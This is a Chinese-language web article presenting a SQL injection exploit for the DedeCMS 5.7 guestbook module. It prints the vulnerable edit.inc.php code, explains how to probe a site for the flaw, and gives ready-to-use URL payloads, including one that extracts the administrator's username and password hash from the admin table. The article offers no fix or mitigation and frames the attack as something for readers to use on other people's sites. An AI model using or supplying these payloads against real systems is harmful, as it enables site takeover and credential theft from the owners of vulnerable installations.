dedecms5.7最新sql利用 guestbook.php注射漏洞

這篇文章介紹的內容是關於dedecms5.7最新sql利用guestbook.php注射漏洞，現在分享給大家，有需要的朋友可以參考

影響版本為5.7

漏洞檔edit.inc.php具體程式碼：

< ?php  

if(!defined(&#39;DEDEINC&#39;)) exit(&#39;Request Error!&#39;);  

   

if(!empty($_COOKIE[&#39;GUEST_BOOK_POS&#39;])) $GUEST_BOOK_POS = $_COOKIE[&#39;GUEST_BOOK_POS&#39;];  

else $GUEST_BOOK_POS = "guestbook.php";  

   

$id = intval($id);  

if(empty($job)) $job=&#39;view&#39;;  

   

if($job==&#39;del&#39; && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

else if($job=='check' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

else if($job=='editok')  

{  

$remsg = trim($remsg);  

if($remsg!='')  

{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  

if($g_isadmin)  

{  

$msg = "<p class=&#39;rebox&#39;>".$msg."</p>\n".$remsg;  

//$remsg <br /><font color=red>管理员回复：</font> }  

else 

{  

$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

$oldmsg = "<p class=&#39;rebox&#39;>".addslashes($row['msg'])."</p>\n";  

$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

$msg = $oldmsg.$remsg;  

}  

}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

exit();  

}  

//home:www.errs.cc  

if($g_isadmin)  

{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

}  

else 

{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

}

漏洞成功需要條件：
1. php magic_quotes_gpc=off
2.漏洞檔案存在plus/guestbook.php dede_guestbook 表當然也要存在。

怎麼判斷是否有漏洞：
先開啟www.xxx.com/plus/guestbook.php 可以看到別人的留言，
然後滑鼠放在[回覆/編輯] 上可以看到別人留言的ID。那麼記下ID
訪問：

www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID

提交後如果是dede5.7版本的話會出現“成功更改或回復一條留言” 那就證明修改成功了
跳回到www.xxx .com/plus/guestbook.php 看下你改的那條留言ID是否變成了errs.cc' 

如果變成了那麼證明漏洞無法利用應為他開啟了php magic_quotes_gpc=off

如果沒有修改成功，那留言ID的內容還是以前的那就證明漏洞可以利用。
那麼再次訪問

www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='

然後返回，那條留言ID的內容就直接修改成了mysql 的user().

大概利用就是這樣，大家有興趣的多研究下！ ！

最後補充下，估計有人會說怎麼暴管理後台帳號密碼，你自己研究下 會知道的。反正絕對可以暴出來(不可以暴出來我就不會發)！ ！

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='

               

以上是dedecms5.7最新sql利用 guestbook.php注射漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章！